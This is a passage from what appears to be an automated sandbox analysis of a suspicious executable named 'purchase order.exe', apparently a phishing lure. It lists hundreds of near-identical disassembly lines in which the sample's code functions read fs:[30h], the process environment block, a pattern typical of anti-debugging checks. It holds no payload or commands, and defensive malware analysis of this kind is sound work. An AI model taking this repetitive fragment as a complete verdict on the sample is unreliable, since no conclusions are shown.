                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158A470 mov eax, dword ptr fs:[00000030h]3_2_0158A470
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158A470 mov eax, dword ptr fs:[00000030h]3_2_0158A470
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158A470 mov eax, dword ptr fs:[00000030h]3_2_0158A470
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161A456 mov eax, dword ptr fs:[00000030h]3_2_0161A456
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC460 mov ecx, dword ptr fs:[00000030h]3_2_015EC460
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598402 mov eax, dword ptr fs:[00000030h]3_2_01598402
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598402 mov eax, dword ptr fs:[00000030h]3_2_01598402
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598402 mov eax, dword ptr fs:[00000030h]3_2_01598402
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155C427 mov eax, dword ptr fs:[00000030h]3_2_0155C427
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E420 mov eax, dword ptr fs:[00000030h]3_2_0155E420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E420 mov eax, dword ptr fs:[00000030h]3_2_0155E420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E420 mov eax, dword ptr fs:[00000030h]3_2_0155E420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015604E5 mov ecx, dword ptr fs:[00000030h]3_2_015604E5
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015944B0 mov ecx, dword ptr fs:[00000030h]3_2_015944B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EA4B0 mov eax, dword ptr fs:[00000030h]3_2_015EA4B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161A49A mov eax, dword ptr fs:[00000030h]3_2_0161A49A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015664AB mov eax, dword ptr fs:[00000030h]3_2_015664AB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE75D mov eax, dword ptr fs:[00000030h]3_2_015EE75D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560750 mov eax, dword ptr fs:[00000030h]3_2_01560750
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2750 mov eax, dword ptr fs:[00000030h]3_2_015A2750
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2750 mov eax, dword ptr fs:[00000030h]3_2_015A2750
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E4755 mov eax, dword ptr fs:[00000030h]3_2_015E4755
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159674D mov esi, dword ptr fs:[00000030h]3_2_0159674D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159674D mov eax, dword ptr fs:[00000030h]3_2_0159674D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159674D mov eax, dword ptr fs:[00000030h]3_2_0159674D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568770 mov eax, dword ptr fs:[00000030h]3_2_01568770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560710 mov eax, dword ptr fs:[00000030h]3_2_01560710
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01590710 mov eax, dword ptr fs:[00000030h]3_2_01590710
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C700 mov eax, dword ptr fs:[00000030h]3_2_0159C700
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159273C mov eax, dword ptr fs:[00000030h]3_2_0159273C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159273C mov ecx, dword ptr fs:[00000030h]3_2_0159273C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159273C mov eax, dword ptr fs:[00000030h]3_2_0159273C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DC730 mov eax, dword ptr fs:[00000030h]3_2_015DC730
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C720 mov eax, dword ptr fs:[00000030h]3_2_0159C720
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C720 mov eax, dword ptr fs:[00000030h]3_2_0159C720
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156C7C0 mov eax, dword ptr fs:[00000030h]3_2_0156C7C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E07C3 mov eax, dword ptr fs:[00000030h]3_2_015E07C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015647FB mov eax, dword ptr fs:[00000030h]3_2_015647FB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015647FB mov eax, dword ptr fs:[00000030h]3_2_015647FB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015827ED mov eax, dword ptr fs:[00000030h]3_2_015827ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015827ED mov eax, dword ptr fs:[00000030h]3_2_015827ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015827ED mov eax, dword ptr fs:[00000030h]3_2_015827ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE7E1 mov eax, dword ptr fs:[00000030h]3_2_015EE7E1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016147A0 mov eax, dword ptr fs:[00000030h]3_2_016147A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160678E mov eax, dword ptr fs:[00000030h]3_2_0160678E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015607AF mov eax, dword ptr fs:[00000030h]3_2_015607AF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162866E mov eax, dword ptr fs:[00000030h]3_2_0162866E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162866E mov eax, dword ptr fs:[00000030h]3_2_0162866E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157C640 mov eax, dword ptr fs:[00000030h]3_2_0157C640
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01592674 mov eax, dword ptr fs:[00000030h]3_2_01592674
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A660 mov eax, dword ptr fs:[00000030h]3_2_0159A660
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A660 mov eax, dword ptr fs:[00000030h]3_2_0159A660
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2619 mov eax, dword ptr fs:[00000030h]3_2_015A2619
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE609 mov eax, dword ptr fs:[00000030h]3_2_015DE609
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E627 mov eax, dword ptr fs:[00000030h]3_2_0157E627
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01596620 mov eax, dword ptr fs:[00000030h]3_2_01596620
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598620 mov eax, dword ptr fs:[00000030h]3_2_01598620
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156262C mov eax, dword ptr fs:[00000030h]3_2_0156262C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0159A6C7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A6C7 mov eax, dword ptr fs:[00000030h]3_2_0159A6C7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E06F1 mov eax, dword ptr fs:[00000030h]3_2_015E06F1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E06F1 mov eax, dword ptr fs:[00000030h]3_2_015E06F1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE6F2 mov eax, dword ptr fs:[00000030h]3_2_015DE6F2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE6F2 mov eax, dword ptr fs:[00000030h]3_2_015DE6F2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE6F2 mov eax, dword ptr fs:[00000030h]3_2_015DE6F2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE6F2 mov eax, dword ptr fs:[00000030h]3_2_015DE6F2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564690 mov eax, dword ptr fs:[00000030h]3_2_01564690
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564690 mov eax, dword ptr fs:[00000030h]3_2_01564690
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015966B0 mov eax, dword ptr fs:[00000030h]3_2_015966B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C6A6 mov eax, dword ptr fs:[00000030h]3_2_0159C6A6
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E0946 mov eax, dword ptr fs:[00000030h]3_2_015E0946
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01604978 mov eax, dword ptr fs:[00000030h]3_2_01604978
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01604978 mov eax, dword ptr fs:[00000030h]3_2_01604978
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC97C mov eax, dword ptr fs:[00000030h]3_2_015EC97C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A096E mov eax, dword ptr fs:[00000030h]3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A096E mov edx, dword ptr fs:[00000030h]3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A096E mov eax, dword ptr fs:[00000030h]3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01586962 mov eax, dword ptr fs:[00000030h]3_2_01586962
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01586962 mov eax, dword ptr fs:[00000030h]3_2_01586962
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01586962 mov eax, dword ptr fs:[00000030h]3_2_01586962
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC912 mov eax, dword ptr fs:[00000030h]3_2_015EC912
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01558918 mov eax, dword ptr fs:[00000030h]3_2_01558918
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01558918 mov eax, dword ptr fs:[00000030h]3_2_01558918
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE908 mov eax, dword ptr fs:[00000030h]3_2_015DE908
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE908 mov eax, dword ptr fs:[00000030h]3_2_015DE908
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E892A mov eax, dword ptr fs:[00000030h]3_2_015E892A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F892B mov eax, dword ptr fs:[00000030h]3_2_015F892B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015949D0 mov eax, dword ptr fs:[00000030h]3_2_015949D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F69C0 mov eax, dword ptr fs:[00000030h]3_2_015F69C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015929F9 mov eax, dword ptr fs:[00000030h]3_2_015929F9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015929F9 mov eax, dword ptr fs:[00000030h]3_2_015929F9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162A9D3 mov eax, dword ptr fs:[00000030h]3_2_0162A9D3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE9E0 mov eax, dword ptr fs:[00000030h]3_2_015EE9E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E89B3 mov esi, dword ptr fs:[00000030h]3_2_015E89B3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E89B3 mov eax, dword ptr fs:[00000030h]3_2_015E89B3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E89B3 mov eax, dword ptr fs:[00000030h]3_2_015E89B3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015609AD mov eax, dword ptr fs:[00000030h]3_2_015609AD
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015609AD mov eax, dword ptr fs:[00000030h]3_2_015609AD
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01590854 mov eax, dword ptr fs:[00000030h]3_2_01590854
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564859 mov eax, dword ptr fs:[00000030h]3_2_01564859
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564859 mov eax, dword ptr fs:[00000030h]3_2_01564859
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01572840 mov ecx, dword ptr fs:[00000030h]3_2_01572840
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE872 mov eax, dword ptr fs:[00000030h]3_2_015EE872
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE872 mov eax, dword ptr fs:[00000030h]3_2_015EE872
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F6870 mov eax, dword ptr fs:[00000030h]3_2_015F6870
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F6870 mov eax, dword ptr fs:[00000030h]3_2_015F6870
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC810 mov eax, dword ptr fs:[00000030h]3_2_015EC810
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160483A mov eax, dword ptr fs:[00000030h]3_2_0160483A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160483A mov eax, dword ptr fs:[00000030h]3_2_0160483A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A830 mov eax, dword ptr fs:[00000030h]3_2_0159A830
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov ecx, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582835 mov eax, dword ptr fs:[00000030h]3_2_01582835
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162A8E4 mov eax, dword ptr fs:[00000030h]3_2_0162A8E4
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E8C0 mov eax, dword ptr fs:[00000030h]3_2_0158E8C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C8F9 mov eax, dword ptr fs:[00000030h]3_2_0159C8F9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C8F9 mov eax, dword ptr fs:[00000030h]3_2_0159C8F9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC89D mov eax, dword ptr fs:[00000030h]3_2_015EC89D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560887 mov eax, dword ptr fs:[00000030h]3_2_01560887
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F6B40 mov eax, dword ptr fs:[00000030h]3_2_015F6B40
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F6B40 mov eax, dword ptr fs:[00000030h]3_2_015F6B40
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162AB40 mov eax, dword ptr fs:[00000030h]3_2_0162AB40
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01608B42 mov eax, dword ptr fs:[00000030h]3_2_01608B42
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01614B4B mov eax, dword ptr fs:[00000030h]3_2_01614B4B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01614B4B mov eax, dword ptr fs:[00000030h]3_2_01614B4B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155CB7E mov eax, dword ptr fs:[00000030h]3_2_0155CB7E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160EB50 mov eax, dword ptr fs:[00000030h]3_2_0160EB50
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DEB1D mov eax, dword ptr fs:[00000030h]3_2_015DEB1D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01628B28 mov eax, dword ptr fs:[00000030h]3_2_01628B28
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01628B28 mov eax, dword ptr fs:[00000030h]3_2_01628B28
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158EB20 mov eax, dword ptr fs:[00000030h]3_2_0158EB20
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158EB20 mov eax, dword ptr fs:[00000030h]3_2_0158EB20
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01580BCB mov eax, dword ptr fs:[00000030h]3_2_01580BCB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01580BCB mov eax, dword ptr fs:[00000030h]3_2_01580BCB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01580BCB mov eax, dword ptr fs:[00000030h]3_2_01580BCB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560BCD mov eax, dword ptr fs:[00000030h]3_2_01560BCD
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560BCD mov eax, dword ptr fs:[00000030h]3_2_01560BCD
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560BCD mov eax, dword ptr fs:[00000030h]3_2_01560BCD
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158EBFC mov eax, dword ptr fs:[00000030h]3_2_0158EBFC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568BF0 mov eax, dword ptr fs:[00000030h]3_2_01568BF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568BF0 mov eax, dword ptr fs:[00000030h]3_2_01568BF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568BF0 mov eax, dword ptr fs:[00000030h]3_2_01568BF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015ECBF0 mov eax, dword ptr fs:[00000030h]3_2_015ECBF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160EBD0 mov eax, dword ptr fs:[00000030h]3_2_0160EBD0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01614BB0 mov eax, dword ptr fs:[00000030h]3_2_01614BB0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01614BB0 mov eax, dword ptr fs:[00000030h]3_2_01614BB0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570BBE mov eax, dword ptr fs:[00000030h]3_2_01570BBE
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570BBE mov eax, dword ptr fs:[00000030h]3_2_01570BBE
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160EA60 mov eax, dword ptr fs:[00000030h]3_2_0160EA60
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566A50 mov eax, dword ptr fs:[00000030h]3_2_01566A50
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566A50 mov eax, dword ptr fs:[00000030h]3_2_01566A50
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566A50 mov eax, dword ptr fs:[00000030h]3_2_01566A50
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566A50 mov eax, dword ptr fs:[00000030h]3_2_01566A50
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566A50 mov eax, dword ptr fs:[00000030h]3_2_01566A50
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566A50 mov eax, dword ptr fs:[00000030h]3_2_01566A50
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566A50 mov eax, dword ptr fs:[00000030h]3_2_01566A50
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570A5B mov eax, dword ptr fs:[00000030h]3_2_01570A5B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570A5B mov eax, dword ptr fs:[00000030h]3_2_01570A5B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DCA72 mov eax, dword ptr fs:[00000030h]3_2_015DCA72
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DCA72 mov eax, dword ptr fs:[00000030h]3_2_015DCA72
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159CA6F mov eax, dword ptr fs:[00000030h]3_2_0159CA6F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159CA6F mov eax, dword ptr fs:[00000030h]3_2_0159CA6F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159CA6F mov eax, dword ptr fs:[00000030h]3_2_0159CA6F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015ECA11 mov eax, dword ptr fs:[00000030h]3_2_015ECA11
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01584A35 mov eax, dword ptr fs:[00000030h]3_2_01584A35
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01584A35 mov eax, dword ptr fs:[00000030h]3_2_01584A35
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158EA2E mov eax, dword ptr fs:[00000030h]3_2_0158EA2E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159CA24 mov eax, dword ptr fs:[00000030h]3_2_0159CA24
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560AD0 mov eax, dword ptr fs:[00000030h]3_2_01560AD0
